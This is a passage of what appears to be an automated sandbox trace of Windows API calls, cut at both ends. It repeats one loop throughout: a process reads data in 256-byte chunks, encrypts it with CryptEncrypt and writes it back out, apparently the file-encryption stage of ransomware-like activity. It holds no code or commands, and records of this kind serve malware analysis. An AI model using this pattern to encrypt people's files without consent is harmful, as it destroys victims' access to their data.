returned 1 [0153.460] GetLastError () returned 0x0 [0153.460] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.460] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.460] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.460] GetLastError () returned 0x0 [0153.460] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.460] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.460] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.460] GetLastError () returned 0x0 [0153.460] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.460] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.460] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.460] GetLastError () returned 0x0 [0153.460] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.460] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.460] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.460] GetLastError () returned 0x0 [0153.460] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.460] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.460] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.461] GetLastError () returned 0x0 [0153.461] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.461] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.461] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.461] GetLastError () returned 0x0 [0153.461] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.461] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.461] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.461] GetLastError () returned 0x0 [0153.461] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.461] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.461] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.461] GetLastError () returned 0x0 [0153.461] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.461] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.461] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.461] GetLastError () returned 0x0 [0153.461] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.461] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.461] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.461] GetLastError () returned 0x0 [0153.461] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.461] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.461] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.461] GetLastError () returned 0x0 [0153.462] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.462] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.462] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.462] GetLastError () returned 0x0 [0153.462] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.462] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.462] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.462] GetLastError () returned 0x0 [0153.462] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.462] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.462] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.462] GetLastError () returned 0x0 [0153.462] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.462] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.462] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.462] GetLastError () returned 0x0 [0153.462] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.462] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.462] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.462] GetLastError () returned 0x0 [0153.462] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.462] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.462] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.462] GetLastError () returned 0x0 [0153.462] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.462] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.463] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.463] GetLastError () returned 0x0 [0153.463] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.463] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.463] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.463] GetLastError () returned 0x0 [0153.463] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.463] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.463] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.463] GetLastError () returned 0x0 [0153.463] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.463] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.463] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.463] GetLastError () returned 0x0 [0153.463] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.463] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.463] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.463] GetLastError () returned 0x0 [0153.463] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.463] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.463] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.463] GetLastError () returned 0x0 [0153.463] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.463] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.464] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.464] GetLastError () returned 0x0 [0153.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.464] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.464] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.464] GetLastError () returned 0x0 [0153.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.464] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.464] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.464] GetLastError () returned 0x0 [0153.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.464] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.464] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.464] GetLastError () returned 0x0 [0153.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.464] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.464] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.464] GetLastError () returned 0x0 [0153.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.464] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.464] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.464] GetLastError () returned 0x0 [0153.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.464] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.464] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.464] GetLastError () returned 0x0 [0153.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.465] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.465] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.465] GetLastError () returned 0x0 [0153.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.465] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.465] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.465] GetLastError () returned 0x0 [0153.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: 